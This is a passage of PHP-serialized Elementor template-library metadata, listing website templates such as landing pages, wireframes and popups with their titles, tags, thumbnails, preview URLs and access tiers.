Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:159;a:21:{s:4:\"tmpl\";i:1400;s:2:\"id\";i:23751;s:5:\"title\";s:33:\"Baby Sleep Webinar &#8211; Events\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/63-Baby-Sleep-Webinar.jpg\";s:12:\"tmpl_created\";i:1649676065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/baby-sleep-webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:227:\"[\"Baby\",\"Booking\",\"Business\",\"Children\",\"Course Online\",\"Education\",\"Events\",\"Health\",\"Landing Pages\",\"Life Coach\",\"Lifestyle\",\"Online Event\",\"Online Service\",\"Parenting\",\"Professional\",\"Remote\",\"Services\",\"Training\",\"Webinar\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:160;a:21:{s:4:\"tmpl\";i:1401;s:2:\"id\";i:23776;s:5:\"title\";s:34:\"Ski Hotel Promotion &#8211; Travel\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/04/64-Ski-Hotel-Promotion.jpg\";s:12:\"tmpl_created\";i:1649691720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/ski-hotel-promotion-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Travel\";s:4:\"tags\";s:118:\"[\"Accommodation\",\"Booking\",\"Discount. Landing Pages\",\"Lifestyle\",\"Luxury\",\"Services\",\"Spa\",\"Travel\",\"Trip\",\"Vacation\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:161;a:21:{s:4:\"tmpl\";i:1402;s:2:\"id\";i:23804;s:5:\"title\";s:30:\"Cake Delivery &#8211; Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/04/67-Cake-Delivery.jpg\";s:12:\"tmpl_created\";i:1649692909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/cake-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:101:\"[\"Bakery\",\"Business\",\"Cake\",\"Cooking\",\"Delivery\",\"Discount\",\"Food\",\"Landing Pages\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:162;a:21:{s:4:\"tmpl\";i:1403;s:2:\"id\";i:23832;s:5:\"title\";s:32:\"Furniture Store &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/87-Furniture-Store.jpg\";s:12:\"tmpl_created\";i:1649694812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/furniture-store-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:232:\"[\"Architecture\",\"Art\",\"Business\",\"Construction\",\"Coupon\",\"Creative\",\"Decor\",\"Designer\",\"Discount\",\"Fashion\",\"Furniture Design\",\"Home\",\"House\",\"Interior Design\",\"Landing Pages\",\"Lifestyle\",\"Products\",\"Professional\",\"Services\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:163;a:21:{s:4:\"tmpl\";i:1404;s:2:\"id\";i:23746;s:5:\"title\";s:22:\"Nails &#8211; Business\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/04/62-Nails-1.jpg\";s:12:\"tmpl_created\";i:1649704635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/nails-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:173:\"[\"Art\",\"Beauty\",\"Business\",\"Colorful\",\"Cosmetics\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Girly\",\"Landing Pages\",\"Lifestyle\",\"Manicure\",\"Modern\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:164;a:21:{s:4:\"tmpl\";i:1405;s:2:\"id\";i:23846;s:5:\"title\";s:29:\"Music Festival &#8211; Events\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/04/88-Music-Festival.jpg\";s:12:\"tmpl_created\";i:1649707763;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/music-festival-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:128:\"[\"Author\",\"Booking\",\"Business\",\"Creative\",\"Discount\",\"Events\",\"Landing Pages\",\"Music\",\"Online\",\"Online Event\",\"Party\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:165;a:21:{s:4:\"tmpl\";i:1406;s:2:\"id\";i:23872;s:5:\"title\";s:40:\"Fashion Styling Course &#8211; Education\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/89-Fashion-Styling-Course.jpg\";s:12:\"tmpl_created\";i:1649708569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/fashion-styling-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:173:\"[\"Aesthetic\",\"Art\",\"Beauty\",\"Business\",\"Course Online\",\"Creative\",\"Discount\",\"Education\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Online\",\"Online Service\",\"Stylist\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:166;a:21:{s:4:\"tmpl\";i:1407;s:2:\"id\";i:23897;s:5:\"title\";s:33:\"Bags Online Shop &#8211; Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/04/90-Bags-Online-Shop.jpg\";s:12:\"tmpl_created\";i:1649709513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/bags-online-shop-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:170:\"[\"Art\",\"Bag\",\"Business\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Luxury\",\"Modern\",\"Online\",\"Online Shop\",\"Products\",\"Sales\",\"Shop\",\"Stylist\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:167;a:21:{s:4:\"tmpl\";i:1408;s:2:\"id\";i:23932;s:5:\"title\";s:32:\"Cooking Academy &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/91-Cooking-Academy.jpg\";s:12:\"tmpl_created\";i:1649710216;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/cooking-academy-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:145:\"[\"Academy\",\"Booking\",\"Business\",\"Chef\",\"Cooking\",\"Education\",\"Food\",\"Free Trial\",\"Landing Pages\",\"Professional\",\"School\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:168;a:21:{s:4:\"tmpl\";i:1409;s:2:\"id\";i:23970;s:5:\"title\";s:45:\"Ophthalmology Medical Clinic &#8211; Business\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/04/92-Ophthalmology-Medical-Clinic.jpg\";s:12:\"tmpl_created\";i:1649711096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/ophthalmology-medical-clinic-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:165:\"[\"About\",\"Business\",\"Care\",\"Consulting\",\"Eye\",\"Free Trial\",\"Glasses\",\"Health\",\"Landing Pages\",\"Lifestyle\",\"Medical\",\"Modern\",\"Optometrist\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:169;a:21:{s:4:\"tmpl\";i:1425;s:2:\"id\";i:24331;s:5:\"title\";s:24:\"Wireframe &#8211; Home 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-1.jpg\";s:12:\"tmpl_created\";i:1653988363;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:170;a:21:{s:4:\"tmpl\";i:1218;s:2:\"id\";i:20792;s:5:\"title\";s:26:\"Luxury Car &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/11/250x280-1.jpg\";s:12:\"tmpl_created\";i:1636903770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/luxury-car-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:54:\"[\"car\",\"Ecommerce\",\"Landing Pages\",\"Luxury\",\"Product\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:171;a:21:{s:4:\"tmpl\";i:1428;s:2:\"id\";i:24398;s:5:\"title\";s:25:\"Wireframe &#8211; About 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-1.jpg\";s:12:\"tmpl_created\";i:1653988534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:83:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Professional\",\"Services\",\"Team\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:172;a:21:{s:4:\"tmpl\";i:991;s:2:\"id\";i:13413;s:5:\"title\";s:33:\"Classic | Contact | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Help.jpg\";s:12:\"tmpl_created\";i:1587474761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-contact-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:369;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:173;a:21:{s:4:\"tmpl\";i:1053;s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:312;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:174;a:21:{s:4:\"tmpl\";i:899;s:2:\"id\";i:11839;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Header_small.png\";s:12:\"tmpl_created\";i:1569430015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:20;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:175;a:21:{s:4:\"tmpl\";i:1433;s:2:\"id\";i:24477;s:5:\"title\";s:27:\"Wireframe &#8211; Gallery 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-2.jpg\";s:12:\"tmpl_created\";i:1653988835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:176;a:21:{s:4:\"tmpl\";i:1205;s:2:\"id\";i:20233;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633881371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:177;a:21:{s:4:\"tmpl\";i:1214;s:2:\"id\";i:20539;s:5:\"title\";s:31:\"Design Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:178;a:21:{s:4:\"tmpl\";i:1224;s:2:\"id\";i:21013;s:5:\"title\";s:24:\"Restaurant &#8211; About\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/12/7-About-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638795588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:36:\"[\"About\",\"Chef\",\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:179;a:21:{s:4:\"tmpl\";i:992;s:2:\"id\";i:13402;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/04/Popup-Course-Completed.jpg\";s:12:\"tmpl_created\";i:1587474772;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:619;s:11:\"trend_index\";i:582;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:180;a:21:{s:4:\"tmpl\";i:1206;s:2:\"id\";i:20254;s:5:\"title\";s:41:\"Digital Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Digital-Marketing-Agency-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/digital-marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:65:\"[\"Agency\",\"Business\",\"Digital Agency\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:181;a:21:{s:4:\"tmpl\";i:1235;s:2:\"id\";i:21281;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/16-Services-Law-firm.jpg\";s:12:\"tmpl_created\";i:1638819128;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/law-firm-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Consulting\",\"Law\",\"Law Firm\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:182;a:21:{s:4:\"tmpl\";i:1017;s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:697;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:183;a:21:{s:4:\"tmpl\";i:1213;s:2:\"id\";i:20509;s:5:\"title\";s:40:\"Dogs Adoption &#8211; Social Involvement\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/10/Dog-Adoption-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/dogs-adoption-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social 